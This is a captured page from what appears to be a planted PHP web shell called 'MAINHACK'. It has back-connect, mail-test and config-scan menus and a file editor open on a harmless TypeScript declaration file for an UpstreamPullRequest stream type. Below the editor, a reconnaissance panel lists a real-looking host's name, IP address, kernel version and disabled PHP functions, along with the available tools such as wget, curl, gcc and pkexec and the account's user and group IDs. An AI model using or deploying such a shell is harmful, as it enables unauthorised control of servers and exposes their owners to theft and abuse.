[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: UpstreamPullRequest.d.ts
import type * as Types from "./Types.js"; /** * @since 2.0.0 * @category symbols */ export declare const UpstreamPullRequestTypeId: unique symbol; /** * @since 2.0.0 * @category symbols */ export type UpstreamPullRequestTypeId = typeof UpstreamPullRequestTypeId; /** * @since 2.0.0 * @category models */ export type UpstreamPullRequest<A> = Pulled<A> | NoUpstream; /** * @since 2.0.0 */ export declare namespace UpstreamPullRequest { /** * @since 2.0.0 * @category models */ interface Variance<out A> { readonly [UpstreamPullRequestTypeId]: { readonly _A: Types.Covariant<A>; }; } } /** * @since 2.0.0 * @category models */ export interface Pulled<out A> extends UpstreamPullRequest.Variance<A> { readonly _tag: "Pulled"; readonly value: A; } /** * @since 2.0.0 * @category models */ export interface NoUpstream extends UpstreamPullRequest.Variance<never> { readonly _tag: "NoUpstream"; readonly activeDownstreamCount: number; } /** * @since 2.0.0 * @category constructors */ export declare const Pulled: <A>(value: A) => UpstreamPullRequest<A>; /** * @since 2.0.0 * @category constructors */ export declare const NoUpstream: (activeDownstreamCount: number) => UpstreamPullRequest<never>; /** * Returns `true` if the specified value is an `UpstreamPullRequest`, `false` * otherwise. * * @since 2.0.0 * @category refinements */ export declare const isUpstreamPullRequest: (u: unknown) => u is UpstreamPullRequest<unknown>; /** * Returns `true` if the specified `UpstreamPullRequest` is a `Pulled`, `false` * otherwise. * * @since 2.0.0 * @category refinements */ export declare const isPulled: <A>(self: UpstreamPullRequest<A>) => self is Pulled<A>; /** * Returns `true` if the specified `UpstreamPullRequest` is a `NoUpstream`, * `false` otherwise. * * @since 2.0.0 * @category refinements */ export declare const isNoUpstream: <A>(self: UpstreamPullRequest<A>) => self is NoUpstream; /** * Folds an `UpstreamPullRequest<A>` into a value of type `Z`. * * @since 2.0.0 * @category folding */ export declare const match: { /** * Folds an `UpstreamPullRequest<A>` into a value of type `Z`. * * @since 2.0.0 * @category folding */ <A, Z>(options: { readonly onPulled: (value: A) => Z; readonly onNoUpstream: (activeDownstreamCount: number) => Z; }): (self: UpstreamPullRequest<A>) => Z; /** * Folds an `UpstreamPullRequest<A>` into a value of type `Z`. * * @since 2.0.0 * @category folding */ <A, Z>(self: UpstreamPullRequest<A>, options: { readonly onPulled: (value: A) => Z; readonly onNoUpstream: (activeDownstreamCount: number) => Z; }): Z; }; //# sourceMappingURL=UpstreamPullRequest.d.ts.map
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344